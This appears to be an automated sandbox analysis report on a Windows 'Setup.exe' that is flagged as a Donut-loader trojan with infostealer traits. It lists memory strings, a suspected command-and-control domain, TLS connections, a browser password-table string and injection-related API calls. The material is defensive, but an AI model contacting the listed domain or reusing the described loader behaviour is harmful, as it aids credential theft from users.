Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Setup.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Setup.exe, 00000000.00000003.1960134277.0000000003D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Setup.exe, 00000000.00000003.1960340577.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1960134277.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1982435543.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Setup.exe, 00000000.00000003.1960340577.0000000003CD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Setup.exe, 00000000.00000003.1960340577.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1960134277.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1982435543.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Setup.exe, 00000000.00000003.1960340577.0000000003CD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Setup.exe, 00000000.00000003.1983391322.0000000003CAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click/
Source: Setup.exe, 00000000.00000003.2029575084.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2050988322.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click/?R
Source: Setup.exe, 00000000.00000003.1983391322.0000000003CAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click/S
Source: Setup.exe, 00000000.00000003.1958884457.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959013995.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click/_
Source: Setup.exe, 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.0000000000606000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1982605897.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2003824922.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2050855796.0000000000606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click/api
Source: Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click/apius.wal
Source: Setup.exe, 00000000.00000002.2080291766.0000000000549000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wellofflyric.click:443/api
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49742 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00423B94 NtdllDefWindowProc_A,	0_2_00423B94
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004125E8 NtdllDefWindowProc_A,	0_2_004125E8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0045688C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	0_2_0045688C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0042F394 NtdllDefWindowProc_A,	0_2_0042F394
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004776DC NtdllDefWindowProc_A,	0_2_004776DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FEDF71 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,	0_2_02FEDF71

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

0_2_0042E7A8

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00454B10 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

0_2_00454B10

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431EBC	0_2_00431EBC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0048600C	0_2_0048600C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004320B0	0_2_004320B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004301D0	0_2_004301D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004442C4	0_2_004442C4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0048C314	0_2_0048C314
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430868	0_2_00430868
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0045E8EC	0_2_0045E8EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0045A994	0_2_0045A994
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004449BC	0_2_004449BC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430A7C	0_2_00430A7C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430A20	0_2_00430A20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430A9C	0_2_00430A9C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00434B1C	0_2_00434B1C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430BDC	0_2_00430BDC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00466BB8	0_2_00466BB8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00468C40	0_2_00468C40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430C0C	0_2_00430C0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430CA8	0_2_00430CA8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00444DC8	0_2_00444DC8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430FC8	0_2_00430FC8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00430FEC	0_2_00430FEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00468C40	0_2_00468C40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0045102C	0_2_0045102C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004850D8	0_2_004850D8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0043114C	0_2_0043114C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0047F1BC	0_2_0047F1BC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0043125C	0_2_0043125C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004312E8	0_2_004312E8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431290	0_2_00431290
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0043138C	0_2_0043138C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431424	0_2_00431424
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004314F4	0_2_004314F4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431494	0_2_00431494
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0043153C	0_2_0043153C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004315FC	0_2_004315FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0043D5A4	0_2_0043D5A4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431610	0_2_00431610
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431620	0_2_00431620
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431740	0_2_00431740
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0046F7F0	0_2_0046F7F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00443D1C	0_2_00443D1C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00433E18	0_2_00433E18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00431F28	0_2_00431F28
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA03B1	0_2_02FA03B1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FEDF71	0_2_02FEDF71
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBE2C9	0_2_02FBE2C9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC829E	0_2_02FC829E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBA359	0_2_02FBA359
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FAA33E	0_2_02FAA33E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FE031E	0_2_02FE031E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FDC0FE	0_2_02FDC0FE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA0000	0_2_02FA0000
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FE017E	0_2_02FE017E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FAE615	0_2_02FAE615
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD877E	0_2_02FD877E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCC73E	0_2_02FCC73E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA471E	0_2_02FA471E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FB24A7	0_2_02FB24A7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FDA49E	0_2_02FDA49E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBC44E	0_2_02FBC44E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FDC5EE	0_2_02FDC5EE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FE05CE	0_2_02FE05CE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FAAA4E	0_2_02FAAA4E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FE08BE	0_2_02FE08BE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD89DE	0_2_02FD89DE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBA962	0_2_02FBA962
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBE91E	0_2_02FBE91E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCAE8B	0_2_02FCAE8B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FB2FEE	0_2_02FB2FEE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCEFB8	0_2_02FCEFB8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FE0FAE	0_2_02FE0FAE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD8F4E	0_2_02FD8F4E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FB8CE5	0_2_02FB8CE5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA8C9E	0_2_02FA8C9E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FE0C3E	0_2_02FE0C3E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBEC0E	0_2_02FBEC0E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC0DC0	0_2_02FC0DC0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD925E	0_2_02FD925E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC33AE	0_2_02FC33AE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC1300	0_2_02FC1300
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCD02F	0_2_02FCD02F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBF00E	0_2_02FBF00E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA713E	0_2_02FA713E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA513E	0_2_02FA513E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FB560E	0_2_02FB560E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC374E	0_2_02FC374E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC574E	0_2_02FC574E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FAF4E7	0_2_02FAF4E7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBF54E	0_2_02FBF54E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA5AEE	0_2_02FA5AEE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCFA74	0_2_02FCFA74
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCFA62	0_2_02FCFA62
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA7A2E	0_2_02FA7A2E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCFA18	0_2_02FCFA18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD3B7E	0_2_02FD3B7E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBD835	0_2_02FBD835
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCF934	0_2_02FCF934
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FABEEE	0_2_02FABEEE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA7EBE	0_2_02FA7EBE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD9EAE	0_2_02FD9EAE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FBDE6E	0_2_02FBDE6E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FC1E0E	0_2_02FC1E0E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FD1F1E	0_2_02FD1F1E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCDCCE	0_2_02FCDCCE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCFDE7	0_2_02FCFDE7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FCDD3E	0_2_02FCDD3E

Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 004458F8 appears 59 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00405964 appears 110 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00445628 appears 45 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00406ACC appears 39 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00403400 appears 63 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 02FA96EE appears 75 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 02FB55FE appears 44 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00457214 appears 70 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00403494 appears 85 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00457008 appears 95 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 004529B4 appears 91 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00403684 appears 219 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Setup.exe	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: Setup.exe, 00000000.00000003.1797702038.00000000035E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
Source: Setup.exe, 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe

Source: Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00454B10 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

0_2_00454B10

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00455338 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

0_2_00455338

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_02FA0AC1 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_02FA0AC1

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00456218 CoCreateInstance,SysFreeString,

0_2_00456218

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0040AFD8 FindResourceA,FreeResource,

0_2_0040AFD8

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Setup.exe, 00000000.00000003.1982524608.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup.exe	Virustotal: Detection: 12%
Source: Setup.exe	ReversingLabs: Detection: 15%

Source: Setup.exe	String found in binary or memory: /LoadInf=
Source: Setup.exe	String found in binary or memory: AD/ADDADYADmAD~AD
Source: Setup.exe	String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: Setup.exe	String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalid
Source: Setup.exe	String found in binary or memory: /LoadInf=
Source: Setup.exe	String found in binary or memory: /LoadInf=

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
